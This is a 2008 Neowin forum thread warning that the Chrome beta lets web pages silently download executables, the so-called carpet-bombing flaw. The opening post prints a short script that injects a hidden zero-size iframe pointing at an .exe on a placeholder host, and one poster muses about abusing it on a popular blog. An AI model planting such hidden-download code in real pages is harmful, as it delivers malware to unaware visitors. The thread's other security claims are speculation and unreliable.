White Cuban Posted September 3, 2008 Share Posted September 3, 2008 (edited) Google's new Web browser (Chrome) allows files (e.g., executables) to be automatically downloaded to the user's computer without any user prompt. Example: <script> document.write('<iframe src="http://www.example.com/hello.exe" frameborder="0" width="0" height="0">'); </script> This is just insane. this should be on the news or something, im sure that right now this exploit isnt an hour old, but still. its spreading quick enough. Careful guys Edited April 10, 2009 by Matan Mates Title edited. Please do not use all Caps. Thanks! Link to comment https://www.neowin.net/forum/topic/664974-do-not-use-google-chrome/ Share on other sites More sharing options...
Lant Posted September 3, 2008 Share Posted September 3, 2008 Bugs like that are definitely expected as it is beta, although that is a very bad one. What made me get rid of it was the sentence in the ToS saying they could publish and reproduce anything you post to the internet when using Chrome. Link to comment https://www.neowin.net/forum/topic/664974-do-not-use-google-chrome/#findComment-589736480 Share on other sites More sharing options...
EduardValencia Posted September 3, 2008 Share Posted September 3, 2008 Omg that's evry insecure :o,anyway it's useless for Google to enter the browser Market. Link to comment https://www.neowin.net/forum/topic/664974-do-not-use-google-chrome/#findComment-589736482 Share on other sites More sharing options...
White Cuban Posted September 3, 2008 Author Share Posted September 3, 2008 im looking arround, bugs are appearing everywhere. i found one i think which allows a site to connect a computer to a Zombie sleeper cell net sorta for later use in DDoS attacks, jesus christ Link to comment https://www.neowin.net/forum/topic/664974-do-not-use-google-chrome/#findComment-589736484 Share on other sites More sharing options...
Hurmoth Posted September 3, 2008 Share Posted September 3, 2008 Of course bugs are appearing everywhere, it is a BETA. This is the first release. Can't expect it to be bug free. Just be careful where you browse (which goes for any browser). Link to comment https://www.neowin.net/forum/topic/664974-do-not-use-google-chrome/#findComment-589736488 Share on other sites More sharing options...
39 Thieves Posted September 3, 2008 Share Posted September 3, 2008 im looking arround, bugs are appearing everywhere. i found one i think which allows a site to connect a computer to a Zombie sleeper cell net sorta for later use in DDoS attacks, jesus christ Uh-huh... :rolleyes: What's next, it uploads your credit card info to a cave in Afghanistan so Al Qaeda can buy Anthrax and porn? Link to comment https://www.neowin.net/forum/topic/664974-do-not-use-google-chrome/#findComment-589736492 Share on other sites More sharing options...
White Cuban Posted September 3, 2008 Author Share Posted September 3, 2008 Uh-huh... :rolleyes: What's next, it uploads your credit card info to a cave in Afghanistan so Al Qaeda can buy Anthrax and porn? ehm... no. but there is a new exploit allowing al qaeda upload anthrax through google chrome and spread it arround infidels now lol Link to comment https://www.neowin.net/forum/topic/664974-do-not-use-google-chrome/#findComment-589736500 Share on other sites More sharing options...
Harsesis Posted September 3, 2008 Share Posted September 3, 2008 Its using the old version of webkit... there is a newer version that this bug is fixed on. Its the carpet bomb bug people were going crazy about before. Link to comment https://www.neowin.net/forum/topic/664974-do-not-use-google-chrome/#findComment-589736504 Share on other sites More sharing options...
ozulus Posted September 3, 2008 Share Posted September 3, 2008 I was wondering when something like this was going to appear. Link to comment https://www.neowin.net/forum/topic/664974-do-not-use-google-chrome/#findComment-589736508 Share on other sites More sharing options...
.Kompressor Posted September 3, 2008 Share Posted September 3, 2008 it is an interesting security hole. spyware, trojans, keyloggers and zombie bots will love that bypass. Link to comment https://www.neowin.net/forum/topic/664974-do-not-use-google-chrome/#findComment-589736512 Share on other sites More sharing options...
White Cuban Posted September 3, 2008 Author Share Posted September 3, 2008 yeah, if a guy posts about google chrome a day before 20% of his reader get it. then do the vuln on his site, if its famous blog he cant harvest thousands. Link to comment https://www.neowin.net/forum/topic/664974-do-not-use-google-chrome/#findComment-589736516 Share on other sites More sharing options...
.Kompressor Posted September 3, 2008 Share Posted September 3, 2008 September 2nd, 2008 Google Chrome vulnerable to carpet-bombing flaw Posted by Ryan Naraine @ 3:05 pm http://blogs.zdnet.com/security/?p=1843 http://blogs.zdnet.com/security/?p=1843&tag=nl.e539 Link to comment https://www.neowin.net/forum/topic/664974-do-not-use-google-chrome/#findComment-589736522 Share on other sites More sharing options...
»X« Posted September 3, 2008 Share Posted September 3, 2008 Oh dear. Thanks for the heads up. Im usually very careful anyway but I shall double my efforts. Its annoying because I really love Chrome. Link to comment https://www.neowin.net/forum/topic/664974-do-not-use-google-chrome/#findComment-589736542 Share on other sites More sharing options...
White Cuban Posted September 3, 2008 Author Share Posted September 3, 2008 Why, design looks like lego xD Link to comment https://www.neowin.net/forum/topic/664974-do-not-use-google-chrome/#findComment-589736566 Share on other sites More sharing options...
mocax Posted September 3, 2008 Share Posted September 3, 2008 damn, I was about to test incognito on porn sites I'll hold off for a while, until they fix it. Link to comment https://www.neowin.net/forum/topic/664974-do-not-use-google-chrome/#findComment-589736576 Share on other sites More sharing options...
supernova_00 Posted September 3, 2008 Share Posted September 3, 2008 Why, design looks like lego xD lego, pokemon ball, window media player logo...the list goes on. By the way, there is a forum dedicated to Chrome. Here is the link http://www.chrome-forums.net/phpBB3/index.php Link to comment https://www.neowin.net/forum/topic/664974-do-not-use-google-chrome/#findComment-589736578 Share on other sites More sharing options...
39 Thieves Posted September 3, 2008 Share Posted September 3, 2008 Why, design looks like lego xD Just curious, but might your extreme excitement and opinions on this be based in any part on a vast portion of your blog pertaining to Firefox? lego, pokemon ball, window media player logo...the list goes on.By the way, there is a forum dedicated to Chrome. Here is the link http://www.chrome-forums.net/phpBB3/index.php Um...did you just create that forum? Link to comment https://www.neowin.net/forum/topic/664974-do-not-use-google-chrome/#findComment-589736590 Share on other sites More sharing options...
xinary Posted September 3, 2008 Share Posted September 3, 2008 Why, design looks like lego xD Only if you are on XP. The interface on vista is sex. Link to comment https://www.neowin.net/forum/topic/664974-do-not-use-google-chrome/#findComment-589736596 Share on other sites More sharing options...
White Cuban Posted September 3, 2008 Author Share Posted September 3, 2008 Only if you are on XP. The interface on vista is sex. like streamed sex? :o neat Link to comment https://www.neowin.net/forum/topic/664974-do-not-use-google-chrome/#findComment-589736608 Share on other sites More sharing options...
what Posted September 3, 2008 Share Posted September 3, 2008 Of course bugs are appearing everywhere, it is a BETA. This is the first release. Can't expect it to be bug free.Just be careful where you browse (which goes for any browser). Something as simple and obvious as being able to silently run .exe's should have been tested internally don't you think? Link to comment https://www.neowin.net/forum/topic/664974-do-not-use-google-chrome/#findComment-589736610 Share on other sites More sharing options...
+SOOPRcow MVC Posted September 3, 2008 MVC Share Posted September 3, 2008 Something as simple and obvious as being able to silently run .exe's should have been tested internally don't you think? It doesn't say the exe is being executed, it is just being downloaded so some user interaction is still required. Don't get me wrong though, I understand how serious of an issue it is. Link to comment https://www.neowin.net/forum/topic/664974-do-not-use-google-chrome/#findComment-589736632 Share on other sites More sharing options...
sundayx Veteran Posted September 3, 2008 Veteran Share Posted September 3, 2008 Uh-oh. Link to comment https://www.neowin.net/forum/topic/664974-do-not-use-google-chrome/#findComment-589736640 Share on other sites More sharing options...
- jigz - Posted September 3, 2008 Share Posted September 3, 2008 its BETA for a reason... you find bugs, google puts in a fix.... Link to comment https://www.neowin.net/forum/topic/664974-do-not-use-google-chrome/#findComment-589736650 Share on other sites More sharing options...
sundayx Veteran Posted September 3, 2008 Veteran Share Posted September 3, 2008 Does Chrome auto-update? Link to comment https://www.neowin.net/forum/topic/664974-do-not-use-google-chrome/#findComment-589736658 Share on other sites More sharing options...
39 Thieves Posted September 3, 2008 Share Posted September 3, 2008 Does Chrome auto-update? Says it does. Link to comment https://www.neowin.net/forum/topic/664974-do-not-use-google-chrome/#findComment-589736680 Share on other sites More sharing options...
Recommended Posts